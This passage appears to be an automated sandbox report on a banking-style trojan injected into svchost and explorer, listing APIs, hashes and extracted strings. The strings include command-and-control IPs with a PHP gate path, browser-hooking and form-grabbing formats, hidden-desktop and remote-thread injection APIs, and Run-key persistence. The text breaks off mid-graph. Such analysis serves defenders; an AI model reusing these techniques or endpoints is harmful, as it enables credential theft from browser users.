                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction ID: a3b15b9640374156834b3028bfc9370c0f0fd5d92088258440e5c365a7ccc6d4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF21ED36A2C98681EF70DB12E84C36B6364FBE4B54FB04235E65D865A8DF3DD548EB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction ID: 7928bc1faefc9c44e38c4b47a21e9993421fa75de17c469f87da6617e25dfb57
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE01802B92CA8282EB20DB51E85822B6371FBF9F45FB10535F98EC6664CE3DD55C9600
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction ID: 742266597ddccf9ea966740586333b98672f5aec9c5f55ec13f77dcfc6d8ed67
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6731D87662CAC485DB70DB15E8987ABB3A0F798B40F600125EA8DC7B68DF3CD554DB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF67E6D3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: GetVolumeInformationW.KERNELBASE ref: 00007FF67E6D37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: wsprintfW.USER32 ref: 00007FF67E6D3862
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3955
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF67E6D3A79
                                                                                                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00007FF67E6D3A84
                                                                                                                                                                                                                        • CopyFileW.KERNEL32 ref: 00007FF67E6D3A9D
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF67E6D3AB5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        • Opcode ID: 8ceb8d8f7ec87502f777b2c6a72f705e59c899ddaca8bb5fa566733616542d8b
                                                                                                                                                                                                                        • Instruction ID: 0db313bc0425e3be75b12677872e4ea97d07295e58775e0a742830c2997cc226
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ceb8d8f7ec87502f777b2c6a72f705e59c899ddaca8bb5fa566733616542d8b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2014467B2898292EF60DB24E8543AB5360FBA4744FF05432E24DC75A4EE3CD64EDB40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
                                                                                                                                                                                                                        • Opcode ID: d1c2a8b41111031194efcdec3dcba1c178604344d5892954ccdc9661288b0112
                                                                                                                                                                                                                        • Instruction ID: bd3838a626dea25fa5d904934fb4749a1b9fe863492dc47fbfc87a62e8a26328
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1c2a8b41111031194efcdec3dcba1c178604344d5892954ccdc9661288b0112
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B01D77A628A808ADB50CB15E84471BB7A4F798794FA01225FA8D83B68DF7DC149CB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 55ca7b25fc3fba999383f4887996ef625d541d6321faecf34a0365509225a8ea
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5012C6792C606C6EA30CF21E44432B63A0FB94349FF04135E68D82A98CF7CD54DDB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction ID: 97431c6ab081ac76121f518a4947a93b17c1473fe495580373b0e582d075d6d7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F110336628B4086DB90CB15F44466B77A0FB947A0F605231F9AE87BE8DF7CD149DB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 982e9fddf5a000c0859b0064548dcdacc803ba8c57b988cad7921cd91eae76fd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFE0122A928A87C2DE20EF61F84436A63A0FB94744FF00131F58D82A68DF7CD54DDB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3955
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4524: CreateFileW.KERNELBASE ref: 00007FF67E6D456B
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D10D8: OpenProcess.KERNEL32 ref: 00007FF67E6D10FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF67E6D2FC7
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF67E6D2FDA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: 96d02d8f53e537cfbd773ed7f0058408a3fe38fccfd467091a2057547ba61344
                                                                                                                                                                                                                        • Instruction ID: 6790ac7967057671b2dab347513304128a0864ac7e1bcd0988af8667a08a2bdd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96d02d8f53e537cfbd773ed7f0058408a3fe38fccfd467091a2057547ba61344
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D11EF2A928A8285EF20DB11F8483BB73A0FBA4B44FF00135E54CC6665DF7CD44D9740

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                        Signature Coverage:6.8%
                                                                                                                                                                                                                        Total number of Nodes:351
                                                                                                                                                                                                                        Total number of Limit Nodes:13

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3$ HTTP/1.1$.exe$/VzCAHn.php$185.81.68.147$185.81.68.148$:Zone.Identifier$Accept-Encoding$Advapi32.dll$ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: 
$HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$_errno$_strnicmp$bot|%s|%d|%d|%d|%d|%s|%s|%d|%d$chunked$close$closesocket$connect$firefox.exe$form|%s|%s|%d|$form|%s|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$version.dll$wininet.dll$ws2_32.dll$wsprintfA

                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                        • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 432 dfa6e10-dfa6ed4 call dfaa4e0 call dfe07c0 call dfe07c8 * 5 447 dfa6f30-dfa6f7e call dfe07c8 WSAStartup 432->447 448 dfa6ed6-dfa6eda 432->448 454 dfa6f84-dfa6f9f socket 447->454 455 dfa7405 447->455 448->447 450 dfa6edc-dfa6f2a call dfe07c8 call dfe0738 call dfe07c8 * 2 448->450 450->447 457 dfa740c 454->457 458 dfa6fa5-dfa6fb2 gethostbyname 454->458 455->457 461 dfa740f-dfa7415 call dfe0750 457->461 458->457 460 dfa6fb8-dfa6ff8 call dfe0800 call dfe0850 call dfe0858 458->460 460->457 475 dfa6ffe-dfa7023 call dfe07a8 send 460->475 465 dfa741b-dfa746e closesocket WSACleanup call dfbe480 461->465 475->457 478 dfa7029-dfa7030 475->478 479 dfa704a-dfa7081 call dfaa4e0 478->479 480 dfa7032-dfa7044 send 478->480 483 dfa7090-dfa70ab recv 479->483 480->457 480->479 483->457 484 dfa70b1-dfa70b4 483->484 485 dfa71ca-dfa71d9 484->485 486 dfa70ba-dfa70c3 484->486 485->457 487 dfa71df-dfa71e4 485->487 486->485 488 dfa70c9-dfa70d2 486->488 487->483 488->485 489 dfa70d8-dfa70df 488->489 490 dfa7475-dfa747a call dfbe6f8 489->490 491 dfa70e5-dfa70f3 489->491 492 dfa711a-dfa712f call dfe07a8 491->492 493 dfa70f5-dfa710b call dfe0808 491->493 501 dfa71e9-dfa71f0 492->501 502 dfa7135-dfa714b call dfe0818 492->502 493->457 500 dfa7111-dfa7115 493->500 503 dfa71c6 500->503 505 dfa71fc-dfa71fe 501->505 506 dfa71f2-dfa71f4 501->506 514 dfa714d-dfa7166 call dfe0808 502->514 515 dfa71c4 502->515 503->485 507 dfa739c-dfa739f 505->507 508 dfa7204-dfa7238 malloc 505->508 506->457 510 dfa71fa 506->510 512 dfa73ec-dfa7403 malloc 507->512 513 dfa73a1-dfa73bc malloc 507->513 511 dfa7240-dfa725f recv 508->511 510->508 511->461 516 dfa7265-dfa7267 511->516 512->465 517 dfa73c0-dfa73db recv 513->517 526 dfa7168-dfa7186 call dfe0828 514->526 527 dfa718e-dfa71a0 call 
